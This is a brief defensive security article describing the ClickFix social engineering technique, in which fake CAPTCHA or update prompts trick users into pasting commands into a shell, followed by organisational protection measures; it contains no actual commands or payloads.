ClickFix Social Engineering: When the User Becomes the Attack Vector

ClickFix is a fast-growing social engineering technique where threat actors trick users into copying and pasting malicious commands into the Windows Run dialogue, PowerShell, Terminal and macOS Terminal. Victims are shown fake CAPTCHA checks, browser verification prompts, update notices, or document errors that instruct them to fix the issue manually.

This method is highly effective because the user launches the command themselves, allowing attackers to bypass many traditional email filters, browser protections, and endpoint detections.

How it works

The attacker directs the victim to a malicious or compromised webpage through phishing emails, ads, or infected sites. The page shows a fake CAPTCHA, browser update, or document error while secretly copying a malicious command to the clipboard.

The victim is instructed to press Win + R, open PowerShell (Windows), Terminal (macOS), or Terminal/Shell (Linux), then paste and run the command.

Once run, the command can download malware, steal credentials, establish persistence, or give the attacker remote access to the system.

How to Protect Your Organisation

1. Block Suspicious Clipboard Access: Use browser policies to restrict or prompt for clipboard write access on untrusted websites.

2. Employee Awareness: Teach users to recognise fake CAPTCHA, browser update, and verification prompts. Legitimate websites should never ask users to open Run, PowerShell, or Terminal (on Windows or macOS) or execute pasted commands.

3. Restrict PowerShell (Windows) / Shell Execution (macOS/Linux): Enable Script Block Logging, enforce signed-script execution policies where applicable, and monitor for encoded or obfuscated commands. On macOS and Linux, monitor shell execution patterns and restrict unnecessary privilege escalation via sudo.

4. Endpoint Protection: Enable attack surface reduction rules and web protection to block obfuscated scripts, untrusted executables, and scripts launching downloaded malware.